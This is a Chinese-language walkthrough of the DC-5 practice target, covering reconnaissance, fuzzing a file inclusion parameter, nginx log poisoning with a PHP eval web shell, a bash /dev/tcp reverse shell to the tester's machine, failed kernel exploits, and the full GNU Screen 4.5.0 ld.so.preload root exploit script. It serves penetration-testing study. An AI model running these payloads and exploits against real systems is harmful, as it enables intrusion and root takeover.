信息收集

首先查看 Kali IP 地址：

root at kali in ~/DC5 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1573sec preferred_lft 1573sec
    inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

地址探测

使用 Nmap 扫描出一个 IP：10.10.8.25

root at kali in ~/DC5 
$ nmap -sn -T4 --min-rate 10000 10.10.8.0/24 -oN Nmap_IP_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-25 20:22 CST
Nmap scan report for 10.10.8.1
Host is up (0.00012s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000088s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.25
Host is up (0.000069s latency).
MAC Address: 00:0C:29:85:E9:3E (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000060s latency).
MAC Address: 00:50:56:FF:3C:4E (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.68 seconds

端口扫描

扫描开放端口：

root at kali in ~/DC5 
$ nmap -p- -sT -T4 --min-rate 10000 10.10.8.25 -oN Nmap_Port_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-25 20:22 CST
Nmap scan report for 10.10.8.25
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
46614/tcp open  unknown
MAC Address: 00:0C:29:85:E9:3E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds

服务识别

扫描端口对应服务：

root at kali in ~/DC5 
$ nmap -p80,111,46614 -sV -O -sT -T4 --min-rate 10000 10.10.8.25 -oN Nmap_Server_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-25 20:23 CST
Nmap scan report for 10.10.8.25
Host is up (0.00048s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
111/tcp   open  rpcbind 2-4 (RPC #100000)
46614/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:85:E9:3E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.62 seconds

漏洞扫描

使用 Nmap 进行漏洞扫描：

root at kali in ~/DC5 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.25 -oN Nmap_Vuln_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-25 20:25 CST
Nmap scan report for 10.10.8.25
Host is up (0.00036s latency).
Not shown: 998 closed tcp ports (reset)
PORT    STATE SERVICE
80/tcp  open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.8.25
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.8.25:80/contact.php
|     Form id: fname
|_    Form action: thankyou.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
111/tcp open  rpcbind
MAC Address: 00:0C:29:85:E9:3E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 75.29 seconds

看了下扫出来的漏洞，没一个有用的。

目录扫描

root at kali in ~/DC5 
$ dirsearch -u http://10.10.8.25 -o $PWD/Dirsearch_Dir_Scan.txt

  _|. _ _  _  _  _ _|_    v0.4.2              
 (_||| _) (/_(_|| (_| )   
 
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/DC5/Dirsearch_Dir_Scan.txt

Error Log: /root/.dirsearch/logs/errors-24-06-25_20-27-53.log

Target: http://10.10.8.25/

[20:27:53] Starting: 
[20:28:00] 200 -    4KB - /contact.php                                      
[20:28:00] 301 -  184B  - /css  ->  http://10.10.8.25/css/                  
[20:28:01] 200 -    6KB - /faq.php                                          
[20:28:02] 200 -   17B  - /footer.php                                       
[20:28:02] 403 -  570B  - /images/                                          
[20:28:02] 301 -  184B  - /images  ->  http://10.10.8.25/images/            
[20:28:03] 200 -    4KB - /index.php                                        
[20:28:09] 200 -  852B  - /thankyou.php
                                                                             
Task Completed

漏洞利用

信息收集v2

由于不知道 111 和 46614 端口的作用，这里先访问 Web 服务看看：

其中 footer.php 是一个版本标识文件，但是在 thankyou.php 中出现了版权标识并且会和 footer.php 产生相同的变化，这里就有可能出现文件包含。

文件包含

注：可能会有疑问，具体怎么看出来的呢？可以这么去理解（个人感觉是很牵强的，既然是打靶那就勉强接受吧）：

<header>xxxx</header>
<body>xxxx</body>
<footer>
	if ($_REQUEST['xxx'] != 'footer.php'){
        include $_REQUEST['xxx'];
    } else {
        include 'footer.php';
    }
</footer>

既然可能是文件包含，但是缺少参数，这里可以使用 WFuzz 或者 BurpSuite：

WFuzz

使用如下命令进行测试：

1 2	root at kali in ~/DC5 $ wfuzz -u 'http://10.10.8.25/thankyou.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/wfuzz/general/big.txt > resutl.txt

由于大部分都是 42 L，如果不是 42 L 说明就是我们想要的参数：

root at kali in ~/DC5 
$ cat resutl.txt | grep -v '42 L'
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.8.25/thankyou.php?FUZZ=/etc/passwd
Total requests: 3024

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                    
=====================================================================

000001053:   200        70 L     104 W      2319 Ch     "file"                                                                     

Total time: 0
Processed Requests: 3024
Filtered Requests: 0
Requests/sec.: 0

得到参数：file。

BurpSuite

使用 BurpSuite 进行抓包测试：

也得到参数是 file。

WebShell

由于对方没有开启 SSH 端口，所以无法使用系统日志包含进行 GetShell，所以这里可能就需要进行 Web 日志包含了。
对于 Linux 系统而言，Nginx 配置文件可能在：/etc/nginx/nginx.conf。

访问后得到 Nginx 配置文件内容，日志位置如下：

1 2	access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log;

尝试写入 Shell，记住使用 BurpSuite 进行写入，否则会出现报错：

GET /thankyou.php?file=<?php echo 404;eval($_REQUEST[1]);?> HTTP/1.1
Host: 10.10.8.25
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1

再次访问 /var/log/nginx/access.log 文件，看到出现 404，说明 WebShell 写入成功：

使用 AntSword 连接：

连接成功~，可以看看 thankyou.php 中的代码是不是和我想的一样：

<footer>
    <?php
        $file = $_GET['file'];
            if(isset($file)) {
                include("$file");
            } else {
                include("footer.php");
            }
    ?>
</footer>

还可以，差别不大。

主机信息收集

弹个 Shell 出来，方便执行命令：

1	(www-data:/var/www/html) $ bash -c 'exec bash -i &>/dev/tcp/10.10.8.17/4444 <&1'

结果如下：

root at kali in ~/DC5 
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.8.25: inverse host lookup failed: Unknown host
connect to [10.10.8.17] from (UNKNOWN) [10.10.8.25] 42270
bash: cannot set terminal process group (540): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-5:~/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

下载 lse.sh 信息收集文件：

1 2	root at kali in ~/DC5 $ proxychains curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh

使用 AntSword 上传 lse.sh 并赋权执行：

www-data@dc-5:~/html$ cd /tmp
www-data@dc-5:/tmp$ ls
lse.sh
www-data@dc-5:/tmp$ chmod +x lse.sh
www-data@dc-5:/tmp$ ./lse.sh
---
If you know the current user password, write it here to check sudo privileges:                                                              
---

 LSE Version: 4.14nw                                                                                                             
        User: www-data
     User ID: 33
    Password: none
        Home: /var/www
        Path: :/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
       umask: 0022
......
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/bin/screen-4.5.0
......

发现 screen 具有 SUID 权限，去 GTFOBins 网站看看：

提权

没有 SUID 的利用方式，那就使用提权的信息收集文件：

1 2	root at kali in ~/DC5 $ proxychains wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

使用 AntSword 上传 lse.sh 并赋权执行：

www-data@dc-5:/tmp$ chmod +x les.sh
www-data@dc-5:/tmp$ ./les.sh

Available information:

Kernel version: 3.16.0
Architecture: x86_64
Distribution: debian
Distribution version: 8
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

81 kernel space exploits
49 user space exploits

Possible Exploits:

cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: [ debian=7|8 ],RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

dirtycow（失败）

看着可以用脏牛，试试看，使用 Web 下载 C 文件。
判断靶机是否存在 GCC：

www-data@dc-5:/tmp$ gcc -v
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.9/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 4.9.2-10+deb8u2' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=c,c++,java,go,d,fortran,objc,obj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32,m64,mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.2 (Debian 4.9.2-10+deb8u2)

可以，存在，很 Nice！
上传 40611.c 文件，查看如何编译：

####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################

使用如下命令进行编译：

echo this is not a test > foo
chmod 0404 foo
gcc -pthread 40611.c -o dirtyc0w
./dirtyc0w foo m00000000000000000

执行完不变，淦：

www-data@dc-5:/tmp$ ./dirtyc0w foo m00000000000000000
./dirtyc0w foo m00000000000000000
id
mmap 7f68b1d86000

madvise 0

procselfmem 1800000000

www-data@dc-5:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

overlayfs（失败）

换一个：

[+] [CVE-2015-1328] overlayfs

   Details: http://seclists.org/oss-sec/2015/q2/717
   Exposure: less probable
   Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
   Download URL: https://www.exploit-db.com/download/37292

查看如何编译：

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*

使用如下命令进行编译并执行：

www-data@dc-5:/tmp$ gcc 37292.c -o ofs
www-data@dc-5:/tmp$ ./ofs
spawning threads
failed to create new user namespace
failed to create new mount namespace
child threads done
exploit failed
www-data@dc-5:/tmp$

overlayfs (ovl_setattr)（失败）

还是失败，再换：

[+] [CVE-2015-8660] overlayfs (ovl_setattr)

   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
   Download URL: https://www.exploit-db.com/download/39166

查看如何编译：

/*
just another overlayfs exploit, works on kernels before 2015-12-26

# Exploit Title: overlayfs local root
# Date: 2016-01-05
# Exploit Author: rebel
# Version: Ubuntu 14.04 LTS, 15.10 and more
# Tested on: Ubuntu 14.04 LTS, 15.10
# CVE : CVE-2015-8660

blah@ubuntu:~$ id
uid=1001(blah) gid=1001(blah) groups=1001(blah)
blah@ubuntu:~$ uname -a && cat /etc/issue
Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Ubuntu 14.04.3 LTS \n \l
blah@ubuntu:~$ ./overlayfail
root@ubuntu:~# id
uid=0(root) gid=1001(blah) groups=0(root),1001(blah)

12/2015
by rebel

6354b4e23db225b565d79f226f2e49ec0fe1e19b
*/

使用如下命令进行编译并执行：

www-data@dc-5:/tmp$ gcc 39166.c -o 39166
www-data@dc-5:/tmp$ ./39166
failed to create new user namespace
failed to create new mount namespace
couldn't create suid :(

测试了大概4~5个都不行，那就只能回到原处，看看 SUID 的 screen 了。

screen 提权

既然 GTFOBins 没有，试试 searchsploit 有没有对应内容：

1
2
3

# /bin/screen-4.5.0
root at kali in ~/DC5 
$ searchsploit screen 4.5.0

有个 41154.sh 文件，直接上传到靶机执行试试：

# 移动到当前目录
root at kali in ~/DC5 
$ searchsploit -m linux/local/41154.sh
  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/41154
     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh
    Codes: N/A
 Verified: True
File Type: Bourne-Again shell script, ASCII text executable
Copied to: /root/DC5/41154.sh

# 在靶机上赋权执行
www-data@dc-5:/tmp$ chmod +x 41154.sh
www-data@dc-5:/tmp$ ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

注：看其他博主写的文章，好像都没执行这个文件就直接拆文件编译了。

查找 flag：

cd /root
ls
thisistheflag.txt
cat th*

888b    888 d8b                                                      888      888 888 888 
8888b   888 Y8P                                                      888      888 888 888 
88888b  888                                                          888      888 888 888 
888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 
888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 
888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 
888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  "   "   "  
888    Y888 888  "Y8888P "Y8888        "Y8888888P"   "Y88P"  888     888  888 888 888 888 

Once again, a big thanks to all those who do these little challenges,
and especially all those who give me feedback - again, it's all greatly
appreciated.  :-)

I also want to send a big thanks to all those who find the vulnerabilities
and create the exploits that make these challenges possible.

screen 补充

由于大部分文章都是拆开编译的，我也试试看，首先查看 41154.sh 的内容：

注：如果之前已经执行过 41154.sh 在编译 rootshell.c 时会报错，需要重新导入靶机。

root at kali in ~/DC5 
$ cat 41154.sh                   
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

可以看到脚本分成了三个部分，分别是：

libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

run.sh

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

将三个文件都上传到靶机上，依次使用如下命令：

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
chmod +x run.sh
./run.sh

结果如下：

www-data@dc-5:/tmp$ ./run.sh
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

id
uid=0(root) gid=0(root) groups=0(root),33(www-data)